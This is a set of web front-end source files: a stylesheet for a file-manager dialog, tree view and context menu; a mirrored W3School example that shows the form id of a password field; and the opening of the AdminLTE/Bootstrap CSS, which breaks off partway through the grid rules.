.aui_loading { height: 100%; width: 100%; overflow: hidden; position: absolute; left: 0; top: 40px; z-index: 9999; text-align: center; text-indent: -999em; background: url("../../../images/dialog_loading.gif") no-repeat center center;}
table.aui_border,table.aui_dialog { width: 100%; border: 0; margin: 0; border-collapse: collapse;}
.aui_nw,.aui_n,.aui_ne,.aui_w,.aui_c,.aui_e,.aui_sw,.aui_s,.aui_se,.aui_header,.aui_tdIcon,.aui_main,.aui_footer { padding: 0;}
.aui_header,.aui_buttons button { font: 12px/1.11;}
.aui_title { overflow: hidden; text-overflow: ellipsis;}
.aui_title img { width: 18px; height: 18px; margin-right: 5px; border-radius: 4px;}
.aui_state_noTitle .aui_title { display: none;}
.aui_main { text-align: center; min-width: 9em; min-width: 0 \9; visibility: auto;}
.aui_content { text-align: left; font-size: 14px; color: #666; border: none 0; width: 100%; height: 100%;}
.aui_content.aui_state_full { display: block; width: 100%; margin: 0; padding: 0 !important; height: 100%;}
.aui_icon { vertical-align: middle;}
.aui_icon div { width: 48px; height: 48px; margin: 10px 0 10px 10px; background-position: center center; background-repeat: no-repeat;}
body div .aui_border { *border: 1px solid #bbb;}
body div .aui_border { border: 1px solid #bbb \0/IE9;}
:root body div .aui_border { border: 0px solid \0/IE9;}
.aui_buttons { padding: 10px 8px; text-align: right; white-space: nowrap; background-color: #F6F6F6; border-top: solid 1px #DADEE5;}
.aui_buttons button { margin-left: 15px; padding: 3px 20px; height: 25px; cursor: pointer; display: inline-block; text-align: center; line-height: 1; overflow: visible; color: #000000; border: none; background: #aaa; color: #fff;}
.aui_buttons button:focus { outline: none 0;}
.aui_buttons button:hover { background: #c4c4c4;}
.aui_buttons button:active { background: #777777;}
.aui_buttons button[disabled] { cursor: default; color: #919191; background: #aaa; opacity: 0.5; filter: alpha(opacity=50);}
.aui_buttons button::-moz-focus-inner { border: 0; padding: 0; margin: 0;}
.aui_buttons button.aui_state_highlight { color: #FFF; background: #03B3B2;}
.aui_buttons button.aui_state_highlight:hover { color: #FFF; background: #04e5e4;}
.aui_buttons button.aui_state_highlight:active { background: #014f4e;}
.aui_outer { border: 0px solid #03B3B2; -webkit-box-shadow: 0px 5px 20px rgba(0,0,0,0.6); -moz-box-shadow: 0px 5px 20px rgba(0,0,0,0.6); box-shadow: 0px 5px 20px rgba(0,0,0,0.6);}
.aui_inner { background: #FFF;}
.aui_state_lock .aui_nw,.aui_state_lock .aui_n,.aui_state_lock .aui_ne,.aui_state_lock .aui_w,.aui_state_lock .aui_e,.aui_state_lock .aui_sw,.aui_state_lock .aui_s,.aui_state_lock .aui_se { background: rgba(0,0,0,0.5); background: #000 \9 !important; opacity: 0.5; filter: alpha(opacity=50);}
.aui_titleBar { position: relative; height: 100%;}
.aui_title { height: 31px; line-height: 30px; padding: 0 28px 0 10px; color: #fff; font-size: 14px; background-color: #03B3B2; border-bottom: 1px solid #028180;}
.aui_state_focus .aui_mask { display: none;}
.aui_state_focus .aui_outer { -webkit-box-shadow: 0px 5px 60px rgba(0,0,0,0.8); -moz-box-shadow: 0px 5px 60px rgba(0,0,0,0.8); box-shadow: 0px 5px 60px rgba(0,0,0,0.8);}
.aui_min,.aui_max,.aui_close { display: block; position: absolute; text-decoration: none; outline: none; cursor: pointer; font-size: 16px; background: #04dbda; color: #fff; border-top: none; top: 0px; height: 22px; width: 35px; font-size: 14px; line-height: 22px; text-align: center; font-family: FontAwesome;}
.aui_min:hover,.aui_max:hover,.aui_close:hover { text-decoration: none; color: #fff; background: #cc0000;}
.aui_min:active,.aui_max:active,.aui_close:active { color: fff; background: #f00;}
.aui_min { right: 77px; content: "\f068";}
.aui_max { right: 41px; content: "\f065";}
.aui_close { right: 5px; content: "\f00d";}
.aui_min:before { content: "\f068";}
.aui_max:before { content: "\f065";}
.aui_close:before { content: "\f00d";}
.dialogMax .aui_max:before { content: "\f066";}
.aui_max,.aui_min { display: none;}
.aui_state_noTitle .aui_nw,.aui_state_noTitle .aui_ne,.aui_state_noTitle .aui_sw,.aui_state_noTitle .aui_se { width: 5px; height: 5px;}
.aui_state_noTitle .aui_titleBar { bottom: 0; _bottom: 0; _margin-top: 0;}
.aui_state_noTitle .aui_outer { box-shadow: none; border: none;}
.aui_state_noTitle .aui_inner { border: 1px solid #aaa;}
.aui_state_noTitle .tips { font-size: 14px; padding: 15px; padding-left: 10px;}
.aui_state_noTitle .aui_nw,.aui_state_noTitle .aui_n,.aui_state_noTitle .aui_ne,.aui_state_noTitle .aui_w,.aui_state_noTitle .aui_e,.aui_state_noTitle .aui_sw,.aui_state_noTitle .aui_s,.aui_state_noTitle .aui_se { background: rgba(0,0,0,0.1); background: #000 \9 !important; filter: alpha(opacity=10)!important;}
.aui_state_noTitle .aui_close,.aui_state_noTitle .aui_max,.aui_state_noTitle .aui_min { display: none; font-size: 13px;}
.dialogMax .aui_nw,.dialogMax .aui_ne,.dialogMax .aui_sw,.dialogMax .aui_se,.dialogMax .aui_w,.dialogMax .aui_e { width: 0px;}
.dialogMax .aui_sw,.dialogMax .aui_n,.dialogMax .aui_se { height: 0px;}
.dialogMax .aui_outer { border: none;}
.dialog-can-resize .resize-handle { position: absolute; z-index: 9999; display: block;}
.dialog-can-resize .resize-top { z-index: 0; cursor: n-resize; top: -3px; left: 0px; height: 7px; width: 100%;}
.dialog-can-resize .resize-bottom { z-index: 0; cursor: s-resize; bottom: -3px; left: 0px; height: 7px; width: 100%;}
.dialog-can-resize .resize-right { z-index: 0; cursor: e-resize; right: -3px; top: 0px; width: 7px; height: 100%;}
.dialog-can-resize .resize-left { z-index: 0; cursor: w-resize; left: -3px; top: 0px; width: 7px; height: 100%;}
.dialog-can-resize .resize-bottom-right { cursor: se-resize; width: 18px; height: 18px; right: -7px; bottom: -7px; background: url('../../../images/resize_corner.png') no-repeat;}
.dialog-can-resize .resize-bottom-left { cursor: sw-resize; width: 15px; height: 15px; left: -7px; bottom: -7px;}
.dialog-can-resize .resize-top-left { cursor: nw-resize; width: 15px; height: 15px; left: -7px; top: -7px;}
.dialog-can-resize .resize-top-right { cursor: ne-resize; width: 15px; height: 15px; right: -5px; top: -7px;}
.dialog-can-resize .aui_min,.dialog-can-resize .aui_max { display: block;}
div.dialog-simple .aui_outer { border: none; border-radius: none; box-shadow: none; background: none;}
div.dialog-simple .aui_inner { border: none; background: none;}
div.dialog-simple .aui_nw,div.dialog-simple .aui_n,div.dialog-simple .aui_ne,div.dialog-simple .aui_w,div.dialog-simple .aui_e,div.dialog-simple .aui_sw,div.dialog-simple .aui_s,div.dialog-simple .aui_se { background: none;}
div.dialog-simple .aui_title { background: rgba(0,0,0,0.5); opacity: 0.6; filter: alpha(opacity=60); border-radius: 3px; border: none;}
div.dialog-simple .aui_min,div.dialog-simple .aui_max,div.dialog-simple .aui_close { border: none; top: 3px; display: block; position: absolute; text-decoration: none; outline: none; cursor: pointer; background: #000; color: #fff; opacity: 0.5; filter: alpha(opacity=50); height: 22px; width: 22px; font-size: 14px; line-height: 22px; text-align: center; border-radius: 4px; font-family: FontAwesome;}
div.dialog-simple .aui_min:hover,div.dialog-simple .aui_max:hover,div.dialog-simple .aui_close:hover { text-decoration: none; color: #fff; background: #cc0000;}
div.dialog-simple .aui_min:active,div.dialog-simple .aui_max:active,div.dialog-simple .aui_close:active { color: fff; background: #f00;}
div.dialog-simple .aui_max { right: 30px;}
div.dialog-simple .aui_min { right: 56px;}
div.dialog-simple .aui_dialog { background: none;}
div.dialog-simple .resize-bottom-right { background: none !important;}
div.dialog-simple .aui_header { opacity: 0.01; filter: alpha(opacity=1);}
div.dialog-simple .aui_nw,div.dialog-simple .aui_ne { height: 0px;}
div.dialog-simple .dialog_mouse_in .aui_header { opacity: 1; filter: alpha(opacity=100);}
body div.dialog-simple.aui_state_drag .aui_header { opacity: 1; filter: alpha(opacity=100);}
.ztree { font-size: 12px; padding: 0; margin: 0px; margin-top: 10px;}
.ztree li { padding: 0; margin: 0; list-style: none; text-align: left; white-space: nowrap; outline: 0; line-height: 24px;}
.ztree li ul { margin: 0; padding: 0;}
.ztree li.level0 { margin-bottom: 5px;}
.ztree li span { line-height: 22px;}
.ztree li span.button { line-height: 0; margin: 0; display: inline-block; vertical-align: middle; cursor: pointer; outline: none; background-color: transparent; background-repeat: no-repeat; height: 22px; width: 18px; background: url("../../../images/tree.png") no-repeat; margin-right: 5px;}
.ztree li span.button.switch { width: 16px; height: 22px;}
.ztree li span.button.noline_open,.ztree li span.button.noline_open_hover { background-position: -16px -353px;}
.ztree li span.button.noline_open.switch_hover,.ztree li span.button.noline_open_hover.switch_hover { background-position: -48px -353px !important;}
.ztree li span.button.noline_close,.ztree li span.button.noline_close_hover { background-position: 0px -353px;}
.ztree li span.button.noline_close.switch_hover,.ztree li span.button.noline_close_hover.switch_hover { background-position: -32px -353px !important;}
.ztree li span.button.ico_loading { background: url("../../../images/loading_tree.gif") no-repeat scroll 0 2px transparent;}
.ztree li a { padding-top: 1px; cursor: pointer; text-decoration: none; display: block; margin: 0; color: #333; vertical-align: top; height: 22px; padding-left: 10px; border: 1px solid #f3f3f3;}
.ztree li a:hover { text-decoration: none; -webkit-transition: all 0.3s; -moz-transition: all 0.3s; -o-transition: all 0.3s; -ms-transition: all 0.3s; transition: all 0.3s; background: #ffd987; height: 22px; border: 1px solid #ffd987;}
.ztree li a.curSelectedNode { border: 1px solid #03B3B2; background: #03B3B2; line-height: 22px; height: 22px; color: #fff;}
.ztree li a.curSelectedNode_Edit { border: 1px solid #03B3B2; background: #03B3B2; color: black; height: 23px;}
.ztree li a input.rename { height: 20px; line-height: 22px; width: 100px; padding: 0; margin: 0; border: none; outline: none; padding-left: 5px; font-size: 12px;}
.ztree li a span.button.root_docu { background: none;}
.ztree li a span.button.noline_docu { background: none;}
.ztree li a span.button.root_ico_open,.ztree li a span.button.root_ico_close,.ztree li a span.button.root_ico_docu { background-position: 0 -160px;}
.ztree li a span.button.fav_ico_open,.ztree li a span.button.fav_ico_close,.ztree li a span.button.fav_ico_docu { background-position: 0px -275px;}
.ztree li a span.button.lib_ico_open,.ztree li a span.button.lib_ico_close,.ztree li a span.button.lib_ico_docu { background-position: 0px -245px;}
.ztree li a span.button.my_ico_open,.ztree li a span.button.my_ico_close,.ztree li a span.button.my_ico_docu { background-position: 0px -327px;}
.ztree li a span.button.folder_ico_close,.ztree li a span.button.folder_ico_open,.ztree li a span.button.folder_ico_docu,.ztree li a span.button.ico_close,.ztree li a span.button.ico_open,.ztree li a span.button.ico_docu { background-position: 0 -100px;}
.ztree li a span.button.doc_ico_close,.ztree li a span.button.doc_ico_docu,.ztree li a span.button.doc_ico_open { background-position: 0 -188px;}
.ztree li a span.button.pic_ico_close,.ztree li a span.button.pic_ico_docu,.ztree li a span.button.pic_ico_open { background-position: 0 -132px;}
.ztree li a span.button.music_ico_close,.ztree li a span.button.music_ico_docu,.ztree li a span.button.music_ico_open { background-position: 0 -70px;}
.ztree li a span.button.movie_ico_close,.ztree li a span.button.movie_ico_docu,.ztree li a span.button.movie_ico_open { background-position: 0 -220px;}
.ztree li a span.button.download_ico_close,.ztree li a span.button.download_ico_docu,.ztree li a span.button.download_ico_open { background-position: 0 -301px;}
ul.ztree.zTreeDragUL { margin: 0; padding: 0; position: absolute; width: auto; height: auto; background-color: #03B3B2; border: 1px solid #03B3B2; opacity: 0.5; filter: alpha(opacity=50);}
ul.ztree.zTreeDragUL li a span.space { display: none !important;}
ul.ztree.zTreeDragUL li a { padding: 4px 10px 0 10px; color: #fff;}
ul.ztree.zTreeDragUL li span.button.switch { display: none;}
.ztree li a.tmpTargetNode_inner { background: #014f4e; border: 1px solid #028180; color: #fff;}
.ztree li a.tmpTargetNode_prev { border-bottom: 1px solid #f96;}
.ztree li a.tmpTargetNode_next { border-bottom: 1px solid #f96;}
span.tmpzTreeMove_arrow { display: inline-block; margin: 4px 0 0 2px; position: absolute; border-color: transparent transparent transparent #fff; border-style: solid; border-width: 7px 0px 7px 7px; width: 0; height: 0; _border-top-color: white; _border-bottom-color: white; _filter: chroma(color=white);}
.frame-left .ztree li .file { line-height: 0; margin: 0; display: inline-block; vertical-align: middle; cursor: pointer; outline: none; background-color: transparent; background-repeat: no-repeat; height: 22px; width: 18px; margin-right: 5px; background: url("./../../../images/file_16/file.png") no-repeat;}
.frame-left .ztree li .cpp,.frame-left .ztree li .h,.frame-left .ztree li .sql,.frame-left .ztree li .java,.frame-left .ztree li .cs,.frame-left .ztree li .py,.frame-left .ztree li .html,.frame-left .ztree li .htm,.frame-left .ztree li .shtml,.frame-left .ztree li .hta,.frame-left .ztree li .css,.frame-left .ztree li .js,.frame-left .ztree li .xml,.frame-left .ztree li .php,.frame-left .ztree li .jsp,.frame-left .ztree li .asp,.frame-left .ztree li .aspx,.frame-left .ztree li .vb,.frame-left .ztree li .vbs,.frame-left .ztree li .bat,.frame-left .ztree li .reg,.frame-left .ztree li .cmd,.frame-left .ztree li .pl,.frame-left .ztree li .pm,.frame-left .ztree li .cgi,.frame-left .ztree li .as { background-image: url("./../../../images/file_16/code.png");}
.frame-left .ztree li .oexe { background-image: url("./../../../images/file_16/oexe.png");}
.frame-left .ztree li .txt,.frame-left .ztree li .ini { background-image: url("./../../../images/file_16/txt.png");}
.frame-left .ztree li .html,.frame-left .ztree li .htm,.frame-left .ztree li .url { background-image: url("./../../../images/file_16/html.png");}
.frame-left .ztree li .css { background-image: url("./../../../images/file_16/css.png");}
.frame-left .ztree li .js { background-image: url("./../../../images/file_16/js.png");}
.frame-left .ztree li .xml,.frame-left .ztree li .config,.frame-left .ztree li .manifest,.frame-left .ztree li .xaml,.frame-left .ztree li .csproj,.frame-left .ztree li .vbproj { background-image: url("./../../../images/file_16/xml.png");}
.frame-left .ztree li .php { background-image: url("./../../../images/file_16/php.png");}
.frame-left .ztree li .py { background-image: url("./../../../images/file_16/py.png");}
.frame-left .ztree li .h,.frame-left .ztree li .cpp,.frame-left .ztree li .c { background-image: url("./../../../images/file_16/cpp.png");}
.frame-left .ztree li .pdf { background-image: url("./../../../images/file_16/pdf.png");}
.frame-left .ztree li .psd { background-image: url("./../../../images/file_16/psd.png");}
.frame-left .ztree li .flv,.frame-left .ztree li .f4v { background-image: url("./../../../images/file_16/flv.png");}
.frame-left .ztree li .fla { background-image: url("./../../../images/file_16/fla.png");}
.frame-left .ztree li .swf { background-image: url("./../../../images/file_16/swf.png");}
.frame-left .ztree li .air { background-image: url("./../../../images/file_16/air.png");}
.frame-left .ztree li .zip,.frame-left .ztree li .tar,.frame-left .ztree li .gzip { background-image: url("./../../../images/file_16/zip.png");}
.frame-left .ztree li .rar { background-image: url("./../../../images/file_16/rar.gif");}
.frame-left .ztree li .dll { background-image: url("./../../../images/file_16/dll.png");}
.frame-left .ztree li .exe { background-image: url("./../../../images/file_16/exe.png");}
.frame-left .ztree li .ttf { background-image: url("./../../../images/file_16/ttf.png");}
.frame-left .ztree li .bat,.frame-left .ztree li .cmd { background-image: url("./../../../images/file_16/cmd.png");}
.frame-left .ztree li .ini { background-image: url("./../../../images/file_16/ini.png");}
.frame-left .ztree li .jpg,.frame-left .ztree li .png,.frame-left .ztree li .bmp,.frame-left .ztree li .gif,.frame-left .ztree li .ttf { background-image: url("./../../../images/file_16/jpg.png");}
.frame-left .ztree li .mp3,.frame-left .ztree li .wma,.frame-left .ztree li .mp2,.frame-left .ztree li .mid,.frame-left .ztree li .aac { background-image: url("./../../../images/file_16/mp3.png");}
.frame-left .ztree li .avi,.frame-left .ztree li .rm,.frame-left .ztree li .rmvb,.frame-left .ztree li .mpg,.frame-left .ztree li .mkv,.frame-left .ztree li .wmv,.frame-left .ztree li .mov,.frame-left .ztree li .mp4 { background-image: url("./../../../images/file_16/avi.png");}
.frame-left .ztree li .doc,.frame-left .ztree li .docx,.frame-left .ztree li .wps { background-image: url("./../../../images/file_16/doc.png");}
.frame-left .ztree li .xls,.frame-left .ztree li .xlsx { background-image: url("./../../../images/file_16/xls.png");}
.frame-left .ztree li .ppt,.frame-left .ztree li .pptx { background-image: url("./../../../images/file_16/ppt.png");}
.playmusic-icon { display: none;}
.context-menu-list { margin: 0; margin-left: 4px; min-width: 120px; max-width: 250px; font-size: 12px; display: inline-block; position: absolute; list-style-type: none; padding: 8px 0px; border: 1px solid #aaa \9; box-shadow: 0 10px 40px rgba(0,0,0,0.4); background: #fff;}
.context-menu-list li.selected { border-left: none !important; background: none;}
.context-menu-list li.selected i.font-icon { color: #888; font-family: FontAwesome; font-weight: normal; font-style: normal;}
.context-menu-list li.selected i.font-icon:before { content: "\f00c" !important;}
.context-menu-list .context-menu-submenu:after { content: "\f0da"; font-family: FontAwesome; display: inline-block; float: right; margin-right: -30px;}
.context-menu-list .set_sort_up { margin-top: 5px;}
.context-menu-list .context-menu-item { display: block; cursor: pointer; white-space: nowrap; color: #444; line-height: 25px; height: 25px; position: relative; padding: 0 40px 0 20px; border: none;}
.context-menu-list .context-menu-item span i { float: right; text-align: right; font-style: normal; color: #888;}
.context-menu-list .context-menu-item .font-icon { display: inline-block; width: 27px; font-size: 1.2em; color: #888;}
.context-menu-list .context-menu-item.disabled,.context-menu-list .context-menu-item.disable { color: #ccc;}
.context-menu-list .context-menu-item.disabled .font-icon,.context-menu-list .context-menu-item.disable .font-icon { color: #ddd;}
.context-menu-list .context-menu-item.disabled.hover,.context-menu-list .context-menu-item.disable.hover { color: #ccc; cursor: default; background-color: #fff;}
.context-menu-list .context-menu-item.disabled.hover .font-icon,.context-menu-list .context-menu-item.disable.hover .font-icon { color: #ddd;}
.context-menu-list .context-menu-item.hover { cursor: pointer; color: #fff; background: #03B3B2; background-color: none \9;}
.context-menu-list .context-menu-item.hover .font-icon { color: #fff;}
.context-menu-list .context-menu-item.context-menu-separator { height: 2px; line-height: 0; border-bottom: 1px solid #eee; margin: 2px 0 2px;}
.context-menu-list .context-menu-item > .context-menu-list { display: none; right: -5px; top: 5px;}
.context-menu-list .context-menu-item.hover > .context-menu-list { display: block;}
.context-menu-list .context-menu-item.hover > .context-menu-list .font-icon { color: #888;}
.context-menu-list .context-menu-item.hover > .context-menu-list .hover .font-icon { color: #fff;}
.context-menu-list .context-menu-item .context-menu-accesskey { text-decoration: underline;}
.frame-main { position: absolute; top: 40px; width: 100%; bottom: 32px;}
.frame-main .frame-left { position: absolute; left: 0; top: 0; bottom: 0; width: 200px; background: #f3f3f3; background-attachment: fixed; overflow: auto;}
.frame-main .frame-left .ztree { margin-top: 40px;}
.frame-main .frame-left .ztree li { line-height: 22px;}
.frame-main .frame-left .ztree li a { line-height: 22px; height: 22px;}
.frame-main .frame-left .ztree li.level0 { margin-bottom: 0;}
.frame-main .frame-left .tools-left { background: #f8f8f8 url("../../../images/bg.gif") 0 0px; position: fixed; line-height: 30px; padding-left: 20px; height: 28px; border-bottom: 1px solid #ddd; left: 0; width: 100%;}
.frame-main .frame-left .tools-left a { font-size: 16px; font-weight: 800; text-decoration: none; color: #999; text-shadow: 0 0 3px; display: inline-block; padding: 2px 6px; margin-top: 3px;}
.frame-main .frame-left .tools-left a:hover { background: url("../../../images/buttons_40.png") 0 0px repeat-x; -webkit-box-shadow: 0 2px 8px rgba(0,0,0,0.8); -moz-box-shadow: 0 2px 8px rgba(0,0,0,0.8); box-shadow: 0 2px 8px rgba(0,0,0,0.8); -webkit-border-radius: 3px; -moz-border-radius: 3px; border-radius: 3px;}
.frame-main .frame-resize { width: 10px; cursor: col-resize; z-index: 100; position: absolute; left: 195px; top: 0; bottom: 0; overflow: hidden; background: url("../../../images/resize.png") 0px 50% no-repeat;}
.frame-main .frame-resize.active { background: #000; opacity: 0.2; filter: alpha(opacity=20);}
.frame-main .frame-right { left: 200px; right: 0; position: absolute; top: 0; bottom: 0; overflow: auto;}
.frame-main .frame-right .frame-right-main .resizeMask { z-index: 999; position: absolute; left: 0; top: 0; bottom: 0; right: 0; display: none;}
.frame-main .frame-right .frame-right-main .frame { height: 100%; border-left: 1px solid #ddd; overflow: hidden;}
|
Coding/W3School/W3CN/www.w3school.com.cn/tiy/loadtextaddc.html | platinhom/ManualHom | <html>
<!-- Mirrored from www.w3school.com.cn/tiy/loadtext.asp?f=hdom_password_form by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Dec 2015 07:26:06 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=GB2312" /><!-- /Added by HTTrack -->
<body>
<form id="form1">
<input type="password" id="password1" />
</form>
<p>The id of the form containing the password field is:
<script type="text/javascript">
x=document.getElementById('password1');
document.write(x.form.id);
</script></p>
</body>
<!-- Mirrored from www.w3school.com.cn/tiy/loadtext.asp?f=hdom_password_form by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Dec 2015 07:26:06 GMT -->
</html> |
src/apps/manage/src/main/webapp/lib/adminlte/css/adminlte.css | stevenzh/tourismwork | @charset "UTF-8";
/*!
* AdminLTE v3.0.3-pre
* Author: Colorlib
* Website: AdminLTE.io <http://adminlte.io>
* License: Open source - MIT <http://opensource.org/licenses/MIT>
*/
/*!
* Bootstrap v4.3.1 (https://getbootstrap.com/)
* Copyright 2011-2019 The Bootstrap Authors
* Copyright 2011-2019 Twitter, Inc.
* Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
*/
:root {
--blue: #007bff;
--indigo: #6610f2;
--purple: #6f42c1;
--pink: #e83e8c;
--red: #dc3545;
--orange: #fd7e14;
--yellow: #ffc107;
--green: #28a745;
--teal: #20c997;
--cyan: #17a2b8;
--white: #ffffff;
--gray: #6c757d;
--gray-dark: #343a40;
--primary: #007bff;
--secondary: #6c757d;
--success: #28a745;
--info: #17a2b8;
--warning: #ffc107;
--danger: #dc3545;
--light: #f8f9fa;
--dark: #343a40;
--breakpoint-xs: 0;
--breakpoint-sm: 576px;
--breakpoint-md: 768px;
--breakpoint-lg: 992px;
--breakpoint-xl: 1200px;
--font-family-sans-serif: "Source Sans Pro", -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol";
--font-family-monospace: SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", monospace;
}
*,
*::before,
*::after {
box-sizing: border-box;
}
html {
font-family: sans-serif;
line-height: 1.15;
-webkit-text-size-adjust: 100%;
-webkit-tap-highlight-color: rgba(0, 0, 0, 0);
}
article, aside, figcaption, figure, footer, header, hgroup, main, nav, section {
display: block;
}
body {
margin: 0;
font-family: "Source Sans Pro", -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol";
font-size: 1rem;
font-weight: 400;
line-height: 1.5;
color: #212529;
text-align: left;
background-color: #ffffff;
}
[tabindex="-1"]:focus {
outline: 0 !important;
}
hr {
box-sizing: content-box;
height: 0;
overflow: visible;
}
h1, h2, h3, h4, h5, h6 {
margin-top: 0;
margin-bottom: 0.5rem;
}
p {
margin-top: 0;
margin-bottom: 1rem;
}
abbr[title],
abbr[data-original-title] {
text-decoration: underline;
-webkit-text-decoration: underline dotted;
text-decoration: underline dotted;
cursor: help;
border-bottom: 0;
-webkit-text-decoration-skip-ink: none;
text-decoration-skip-ink: none;
}
address {
margin-bottom: 1rem;
font-style: normal;
line-height: inherit;
}
ol,
ul,
dl {
margin-top: 0;
margin-bottom: 1rem;
}
ol ol,
ul ul,
ol ul,
ul ol {
margin-bottom: 0;
}
dt {
font-weight: 700;
}
dd {
margin-bottom: .5rem;
margin-left: 0;
}
blockquote {
margin: 0 0 1rem;
}
b,
strong {
font-weight: bolder;
}
small {
font-size: 80%;
}
sub,
sup {
position: relative;
font-size: 75%;
line-height: 0;
vertical-align: baseline;
}
sub {
bottom: -.25em;
}
sup {
top: -.5em;
}
a {
color: #007bff;
text-decoration: none;
background-color: transparent;
}
a:hover {
color: #0056b3;
text-decoration: none;
}
a:not([href]):not([tabindex]) {
color: inherit;
text-decoration: none;
}
a:not([href]):not([tabindex]):hover, a:not([href]):not([tabindex]):focus {
color: inherit;
text-decoration: none;
}
a:not([href]):not([tabindex]):focus {
outline: 0;
}
pre,
code,
kbd,
samp {
font-family: SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", monospace;
font-size: 1em;
}
pre {
margin-top: 0;
margin-bottom: 1rem;
overflow: auto;
}
figure {
margin: 0 0 1rem;
}
img {
vertical-align: middle;
border-style: none;
}
svg {
overflow: hidden;
vertical-align: middle;
}
table {
border-collapse: collapse;
}
caption {
padding-top: 0.75rem;
padding-bottom: 0.75rem;
color: #6c757d;
text-align: left;
caption-side: bottom;
}
th {
text-align: inherit;
}
label {
display: inline-block;
margin-bottom: 0.5rem;
}
button {
border-radius: 0;
}
button:focus {
outline: 1px dotted;
outline: 5px auto -webkit-focus-ring-color;
}
input,
button,
select,
optgroup,
textarea {
margin: 0;
font-family: inherit;
font-size: inherit;
line-height: inherit;
}
button,
input {
overflow: visible;
}
button,
select {
text-transform: none;
}
select {
word-wrap: normal;
}
button,
[type="button"],
[type="reset"],
[type="submit"] {
-webkit-appearance: button;
}
button:not(:disabled),
[type="button"]:not(:disabled),
[type="reset"]:not(:disabled),
[type="submit"]:not(:disabled) {
cursor: pointer;
}
button::-moz-focus-inner,
[type="button"]::-moz-focus-inner,
[type="reset"]::-moz-focus-inner,
[type="submit"]::-moz-focus-inner {
padding: 0;
border-style: none;
}
input[type="radio"],
input[type="checkbox"] {
box-sizing: border-box;
padding: 0;
}
input[type="date"],
input[type="time"],
input[type="datetime-local"],
input[type="month"] {
-webkit-appearance: listbox;
}
textarea {
overflow: auto;
resize: vertical;
}
fieldset {
min-width: 0;
padding: 0;
margin: 0;
border: 0;
}
legend {
display: block;
width: 100%;
max-width: 100%;
padding: 0;
margin-bottom: .5rem;
font-size: 1.5rem;
line-height: inherit;
color: inherit;
white-space: normal;
}
progress {
vertical-align: baseline;
}
[type="number"]::-webkit-inner-spin-button,
[type="number"]::-webkit-outer-spin-button {
height: auto;
}
[type="search"] {
outline-offset: -2px;
-webkit-appearance: none;
}
[type="search"]::-webkit-search-decoration {
-webkit-appearance: none;
}
::-webkit-file-upload-button {
font: inherit;
-webkit-appearance: button;
}
output {
display: inline-block;
}
summary {
display: list-item;
cursor: pointer;
}
template {
display: none;
}
[hidden] {
display: none !important;
}
h1, h2, h3, h4, h5, h6,
.h1, .h2, .h3, .h4, .h5, .h6 {
margin-bottom: 0.5rem;
font-family: inherit;
font-weight: 500;
line-height: 1.2;
color: inherit;
}
h1, .h1 {
font-size: 2.5rem;
}
h2, .h2 {
font-size: 2rem;
}
h3, .h3 {
font-size: 1.75rem;
}
h4, .h4 {
font-size: 1.5rem;
}
h5, .h5 {
font-size: 1.25rem;
}
h6, .h6 {
font-size: 1rem;
}
.lead {
font-size: 1.25rem;
font-weight: 300;
}
.display-1 {
font-size: 6rem;
font-weight: 300;
line-height: 1.2;
}
.display-2 {
font-size: 5.5rem;
font-weight: 300;
line-height: 1.2;
}
.display-3 {
font-size: 4.5rem;
font-weight: 300;
line-height: 1.2;
}
.display-4 {
font-size: 3.5rem;
font-weight: 300;
line-height: 1.2;
}
hr {
margin-top: 1rem;
margin-bottom: 1rem;
border: 0;
border-top: 1px solid rgba(0, 0, 0, 0.1);
}
small,
.small {
font-size: 80%;
font-weight: 400;
}
mark,
.mark {
padding: 0.2em;
background-color: #fcf8e3;
}
.list-unstyled {
padding-left: 0;
list-style: none;
}
.list-inline {
padding-left: 0;
list-style: none;
}
.list-inline-item {
display: inline-block;
}
.list-inline-item:not(:last-child) {
margin-right: 0.5rem;
}
.initialism {
font-size: 90%;
text-transform: uppercase;
}
.blockquote {
margin-bottom: 1rem;
font-size: 1.25rem;
}
.blockquote-footer {
display: block;
font-size: 80%;
color: #6c757d;
}
.blockquote-footer::before {
content: "\2014\00A0";
}
.img-fluid {
max-width: 100%;
height: auto;
}
.img-thumbnail {
padding: 0.25rem;
background-color: #ffffff;
border: 1px solid #dee2e6;
border-radius: 0.25rem;
box-shadow: 0 1px 2px rgba(0, 0, 0, 0.075);
max-width: 100%;
height: auto;
}
.figure {
display: inline-block;
}
.figure-img {
margin-bottom: 0.5rem;
line-height: 1;
}
.figure-caption {
font-size: 90%;
color: #6c757d;
}
code {
font-size: 87.5%;
color: #e83e8c;
word-break: break-word;
}
a > code {
color: inherit;
}
kbd {
padding: 0.2rem 0.4rem;
font-size: 87.5%;
color: #ffffff;
background-color: #212529;
border-radius: 0.2rem;
box-shadow: inset 0 -0.1rem 0 rgba(0, 0, 0, 0.25);
}
kbd kbd {
padding: 0;
font-size: 100%;
font-weight: 700;
box-shadow: none;
}
pre {
display: block;
font-size: 87.5%;
color: #212529;
}
pre code {
font-size: inherit;
color: inherit;
word-break: normal;
}
.pre-scrollable {
max-height: 340px;
overflow-y: scroll;
}
.container {
width: 100%;
padding-right: 7.5px;
padding-left: 7.5px;
margin-right: auto;
margin-left: auto;
}
@media (min-width: 576px) {
.container {
max-width: 540px;
}
}
@media (min-width: 768px) {
.container {
max-width: 720px;
}
}
@media (min-width: 992px) {
.container {
max-width: 960px;
}
}
@media (min-width: 1200px) {
.container {
max-width: 1140px;
}
}
.container-fluid {
width: 100%;
padding-right: 7.5px;
padding-left: 7.5px;
margin-right: auto;
margin-left: auto;
}
.row {
display: -ms-flexbox;
display: flex;
-ms-flex-wrap: wrap;
flex-wrap: wrap;
margin-right: -7.5px;
margin-left: -7.5px;
}
.no-gutters {
margin-right: 0;
margin-left: 0;
}
.no-gutters > .col,
.no-gutters > [class*="col-"] {
padding-right: 0;
padding-left: 0;
}
